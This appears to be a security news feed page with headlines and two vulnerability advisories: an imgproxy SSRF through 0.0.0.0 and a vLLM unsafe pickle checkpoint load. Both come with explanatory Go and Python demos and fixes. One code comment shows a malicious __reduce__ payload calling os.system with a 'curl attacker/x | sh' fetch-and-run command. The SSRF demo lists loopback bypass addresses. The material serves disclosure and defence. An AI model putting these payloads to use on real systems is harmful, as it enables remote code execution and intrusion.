January 27th, 2025 (5 months ago)
Description: A Threat Actor Claims to be Selling Military Service Council of Saudi Arabia
January 27th, 2025 (5 months ago)
Description: Chinese AI platform DeepSeek has disabled registrations on its DeepSeek-V3 chat platform due to an ongoing "large-scale" cyberattack targeting its services. [...]
January 27th, 2025 (5 months ago)
Description: CISOs are planning to adjust their budgets this year to reflect their growing concerns for cybersecurity preparedness in the event of a cyberattack.
January 27th, 2025 (5 months ago)
Description: Apple has released a series of security updates across its product ecosystem, addressing multiple vulnerabilities, including a zero-day flaw that has reportedly been exploited in the wild. The updates, which cover iOS, iPadOS, macOS, watchOS, tvOS, and visionOS, provide fixes for critical security issues that could allow privilege escalation, arbitrary code execution, and denial of service. Actively …
The post Apple Fixes Zero-Day Flaw Exploited in Attacks Against iPhones appeared first on CyberInsider.
January 27th, 2025 (5 months ago)
Description: KINGSMAN INDIA Defaced the Websites of GOSRA ISLAMIA DAKHIL MADRASAH and GABTALI ALIM MADRASAH
January 27th, 2025 (5 months ago)
CVE-2025-24354
Description:
Summary
imgproxy does not block the 0.0.0.0 address, even with IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES set to false. This can expose services on the local host.
Details
imgproxy protects against SSRF to loopback addresses with the following check (from the imgproxy source):
```go
if !config.AllowLoopbackSourceAddresses && ip.IsLoopback() {
	return ErrSourceAddressNotAllowed
}
```
This check is insufficient to prevent access to services on the local host: on Linux a request to 0.0.0.0 is delivered to the local host, so a service bound to 0.0.0.0 (all interfaces) or to loopback receives it. Go's net.IP.IsLoopback follows the loopback definition strictly and returns true only for 127.0.0.0/8 and ::1, so 0.0.0.0 is not blocked.
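The two checks side by side, as an added example written for this page and not imgproxy's own code: the loopback-only check quoted above, and a hardened variant that additionally rejects unspecified addresses with net.IP.IsUnspecified, which covers both 0.0.0.0 and its IPv6 counterpart ::. The function names, the classify helper and the address list are this example's own, and whether the hardened variant matches the upstream fix commit line for line is not asserted here.

```go
package main

import (
	"errors"
	"fmt"
	"net"
)

// ErrSourceAddressNotAllowed mirrors the error name used in the advisory snippet.
var ErrSourceAddressNotAllowed = errors.New("source address is not allowed")

// checkSourceAddrVulnerable reproduces the check quoted in the advisory:
// only loopback addresses (127.0.0.0/8 and ::1) are rejected.
func checkSourceAddrVulnerable(ip net.IP, allowLoopback bool) error {
	if !allowLoopback && ip.IsLoopback() {
		return ErrSourceAddressNotAllowed
	}
	return nil
}

// checkSourceAddrHardened also rejects the unspecified addresses 0.0.0.0 and ::,
// which net.IP.IsLoopback does not treat as loopback. This is a hypothetical
// hardening written for this example, not a copy of imgproxy's patch.
func checkSourceAddrHardened(ip net.IP, allowLoopback bool) error {
	if !allowLoopback && (ip.IsLoopback() || ip.IsUnspecified()) {
		return ErrSourceAddressNotAllowed
	}
	return nil
}

// classify runs both checks over candidate source addresses and returns, per
// address, {allowed by vulnerable check, allowed by hardened check}.
// Non-literal inputs are skipped: a real check runs after DNS resolution.
func classify(addrs []string, allowLoopback bool) map[string][2]bool {
	out := make(map[string][2]bool, len(addrs))
	for _, s := range addrs {
		ip := net.ParseIP(s)
		if ip == nil {
			continue
		}
		out[s] = [2]bool{
			checkSourceAddrVulnerable(ip, allowLoopback) == nil,
			checkSourceAddrHardened(ip, allowLoopback) == nil,
		}
	}
	return out
}

func main() {
	// Constructed sample of source addresses an attacker might place in an
	// image URL; 93.184.216.34 stands in for an ordinary public host.
	addrs := []string{"127.0.0.1", "127.0.0.2", "::1", "::ffff:127.0.0.1", "0.0.0.0", "::", "93.184.216.34"}
	results := classify(addrs, false)
	for _, s := range addrs {
		r := results[s]
		fmt.Printf("%-18s vulnerable check allows: %-5v hardened check allows: %v\n", s, r[0], r[1])
	}
}
```

Running it shows the two unspecified addresses passing the loopback-only check and nothing else changing, which is the whole bug: the IPv4-mapped form ::ffff:127.0.0.1 is already caught because To4() unwraps it inside IsLoopback, so only the unspecified case needs the extra predicate.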
References
https://github.com/imgproxy/imgproxy/security/advisories/GHSA-j2hp-6m75-v4j4
https://nvd.nist.gov/vuln/detail/CVE-2025-24354
https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081
https://github.com/advisories/GHSA-j2hp-6m75-v4j4
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
Description: Open-source password manager Bitwarden is adding an extra layer of security for accounts that are not protected by two-factor authentication, requiring email verification before allowing access to accounts. [...]
January 27th, 2025 (5 months ago)
CVE-2025-24357
Description:
vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load model checkpoints downloaded from Hugging Face. It calls torch.load with the weights_only parameter left at its default of False (the default in PyTorch releases before 2.6, which changed it to True). The PyTorch documentation at https://pytorch.org/docs/stable/generated/torch.load.html warns that torch.load is pickle-based: loading a malicious checkpoint executes arbitrary code during unpickling.
Impact
This vulnerability can be exploited to execute arbitrary code and OS commands on the machine of a victim who fetches a pretrained repository remotely.
Note that most models now use the safetensors format, which does not use pickle and is not affected by this issue.
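Why weights_only matters, as an added example that is neither vLLM's nor PyTorch's code: a constructed pickle "checkpoint" whose __reduce__ hook makes the unpickler call a function, loaded first with plain pickle.loads (which is what torch.load(f, weights_only=False) amounts to) and then through a restricted Unpickler whose find_class admits only an allowlist, the same mechanism torch.load(weights_only=True) applies with an allowlist of tensor and storage types. The payload invokes a harmless recording function rather than os.system, and the allowlist, class and function names are this example's own.

```python
import io
import pickle

# Records what the constructed payload did, so its effect is observable
# without running a real shell command.
EXECUTED = []


def record_execution(msg):
    EXECUTED.append(msg)
    return msg


class MaliciousCheckpoint:
    """Constructed payload object. pickle serialises the return value of
    __reduce__ as "call this callable with these arguments" and the
    unpickler obeys it on load. A real attacker would return
    (os.system, ("curl attacker/x | sh",)) instead of the recorder."""

    def __reduce__(self):
        return (record_execution, ("payload ran during unpickling",))


def build_malicious_checkpoint() -> bytes:
    """Constructed stand-in for a checkpoint file pulled from a model hub."""
    return pickle.dumps({"state_dict": MaliciousCheckpoint()})


def build_benign_checkpoint() -> bytes:
    """Constructed checkpoint containing plain data only, as weights are."""
    return pickle.dumps({"layer.weight": [0.1, -0.2, 0.3], "layer.bias": [0.0]})


def unsafe_load(data: bytes):
    """Equivalent to torch.load(f, weights_only=False): unrestricted unpickling."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Hypothetical allowlist unpickler. Every global the stream tries to
    import goes through find_class; anything outside ALLOWED is refused,
    which is how torch.load(weights_only=True) blocks the callable above."""

    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_load(data: bytes):
    """Equivalent in spirit to torch.load(f, weights_only=True)."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo():
    """Loads the malicious checkpoint both ways and reports what happened."""
    data = build_malicious_checkpoint()
    EXECUTED.clear()
    unsafe_load(data)
    ran_unsafe = list(EXECUTED)
    EXECUTED.clear()
    try:
        safe_load(data)
        rejected = False
    except pickle.UnpicklingError:
        rejected = True
    return {
        "unsafe_executed": ran_unsafe,
        "safe_rejected": rejected,
        "safe_executed": list(EXECUTED),
        "benign_via_safe": safe_load(build_benign_checkpoint()),
    }


if __name__ == "__main__":
    print(demo())
```

The benign checkpoint round-trips through the restricted loader because lists and floats need no global lookups, while the malicious one is refused before the callable is ever resolved. For real checkpoints the practical advice is the same as the advisory's: pass weights_only=True to torch.load, or prefer safetensors, which has no code-execution path at all.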
References
https://github.com/vllm-project/vllm/security/advisories/GHSA-rh4j-5rhw-hr54
https://nvd.nist.gov/vuln/detail/CVE-2025-24357
https://github.com/vllm-project/vllm/pull/12366 (fix)
https://github.com/vllm-project/vllm/commit/d3d6bb13fb62da3234addf6574922a4ec0513d04
https://github.com/vllm-project/vllm/releases/tag/v0.7.0
https://pytorch.org/docs/stable/generated/torch.load.html
https://github.com/advisories/GHSA-rh4j-5rhw-hr54
CVSS: HIGH (7.5) EPSS Score: 0.05%
January 27th, 2025 (5 months ago)